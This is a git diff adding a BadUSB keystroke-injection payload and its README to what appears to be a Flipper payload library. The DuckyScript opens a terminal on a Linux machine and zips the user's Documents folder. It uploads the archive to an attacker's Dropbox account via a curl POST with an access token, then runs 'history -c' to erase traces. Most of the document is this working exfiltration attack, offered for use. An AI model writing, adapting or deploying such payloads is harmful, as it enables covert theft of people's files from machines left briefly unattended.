diff --git a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md new file mode 100644 index 0000000..2d8078a --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md @@ -0,0 +1,32 @@ +# Exfiltrate Linux Content With Dropbox - BADUSB ✅ + +A script used to take folder content on Linux Systems. + +**Category**: Exfiltration, Execution + +[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) + +## Description + +A script used to take folder content on Linux Systems. + +Opens a shel, zip all zippable (R permission) content of the folder, send the zip into the dropbox folder, delete shell history. + +## Getting Started + +### Dependencies + +* Internet Connection +* Linux System +* * Terminal that can be opened by the shortcommand CTRL-ALT t +* DropBox Account for the access token + +### Executing program + +* Plug in your device + +### Settings + +* Set your dropbox access token +* Set the folder path interessed (i.e. /Documents) +* Change (if you think that it is necessary) the delay of the zipping operation diff --git a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/payload.txt new file mode 100644 index 0000000..782cfad --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/payload.txt @@ -0,0 +1,49 @@ +REM ########################################################## +REM # | +REM # Title : Exfiltrate Linux Content With Dropbox | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration | +REM # Target : Linux | +REM # | +REM ########################################################## + +REM Requirements: +REM - Internet Connection +REM - Dropbox Account +REM - - DROPBOX_ACCESS_TOKEN + +REM Required: Set here your Dropbox access TOKEN +DEFINE #TOKEN example +DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload + + +DEFAULT_DELAY 500 +CTRL-ALT t + +DELAY 2000 +STRINGLN ACCESS_TOKEN="#TOKEN" +STRINGLN USER_NAME=$(whoami) +STRINGLN path="/home/$USER_NAME/Documents" +STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1) +STRINGLN NAME="$RANDOM.zip" +STRINGLN ZIP_PATH="$path/$NAME" + +REM The FOLDER that you want to zip, in this example you want to zip all Documents content +STRINGLN FOLDER="/home/$USER_NAME/Documents/" + +REM Delay for zipping operation, it depends by computer power and folder directory +DELAY 10000 + +STRINGLN if [ -r "$FOLDER" ]; then +STRINGLN zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&1 +STRINGLN else +STRINGLN echo "" +STRINGLN fi + +STRINGLN DROPBOX_FOLDER="/$NAME" + +STRINGLN curl -X POST DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" + +DELAY 2000 +STRINGLN history -c